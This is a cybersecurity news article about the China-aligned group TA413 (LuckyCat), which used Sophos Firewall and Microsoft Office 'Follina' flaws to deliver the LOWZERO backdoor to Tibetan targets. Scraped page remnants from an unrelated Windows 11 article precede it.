No matter which version you’re running, ensure you keep your OS fully up-to-date and enable the security options most relevant to you. There’s enough choice available to hopefully configure your devices the exact way you need them to be running at any given time.

Stay safe out there!

Windows 11 pulls ahead of Windows 10 in anti-phishing stakes

A China-aligned advanced persistent threat actor known as TA413 weaponized recently disclosed flaws in Sophos Firewall and Microsoft Office to deploy a never-before-seen backdoor called LOWZERO as part of an espionage campaign aimed at Tibetan entities.
Targets primarily consisted of organizations associated with the Tibetan community, including enterprises associated with the Tibetan

A China-aligned advanced persistent threat actor known as TA413 weaponized recently disclosed flaws in Sophos Firewall and Microsoft Office to deploy a never-before-seen backdoor called **LOWZERO** as part of an espionage campaign aimed at Tibetan entities.

Targets primarily consisted of organizations associated with the Tibetan community, including enterprises associated with the Tibetan government-in-exile.

The intrusions involved the exploitation of CVE-2022-1040 and CVE-2022-30190 (aka "Follina"), two remote code execution vulnerabilities in Sophos Firewall and Microsoft Office, respectively.

"This willingness to rapidly incorporate new techniques and methods of initial access contrasts with the group's continued use of well known and reported capabilities, such as the Royal Road RTF weaponizer, and often lax infrastructure procurement tendencies," Recorded Future said in a new technical analysis.

TA413, also known as LuckyCat, has been linked to relentlessly targeting organizations and individuals associated with the Tibetan community at least since 2020 using malware such as ExileRAT, Sepulcher, and a malicious Mozilla Firefox browser extension dubbed FriarFox.

The group's exploitation of the Follina flaw was previously highlighted by Proofpoint in June 2022, although the ultimate end goal of the infection chains remained unclear.

Also put to use in a spear-phishing attack identified in May 2022 is a malicious RTF document that exploited flaws in Microsoft Equation Editor to drop the custom LOWZERO implant. This is achieved by employing a Royal Road RTF weaponizer tool, which is widely shared among Chinese threat actors.

In another phishing email sent to a Tibetan target in late May, a Microsoft Word attachment hosted on the Google Firebase service attempted to leverage the Follina vulnerability to execute a PowerShell command designed to download the backdoor from a remote server.

LOWZERO, the backdoor, is capable of receiving additional modules from its command-and-control (C2) server, but only on the condition that the compromised machine is deemed to be of interest to the threat actor.

"The group continues to incorporate new capabilities while also relying on tried-and-tested \[tactics, techniques, and procedures," the cybersecurity firm said.

"TA413's adoption of both zero-day and recently published vulnerabilities is indicative of wider trends with Chinese cyber-espionage groups whereby exploits regularly appear in use by multiple distinct Chinese activity groups prior to their widespread public availability."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#microsoft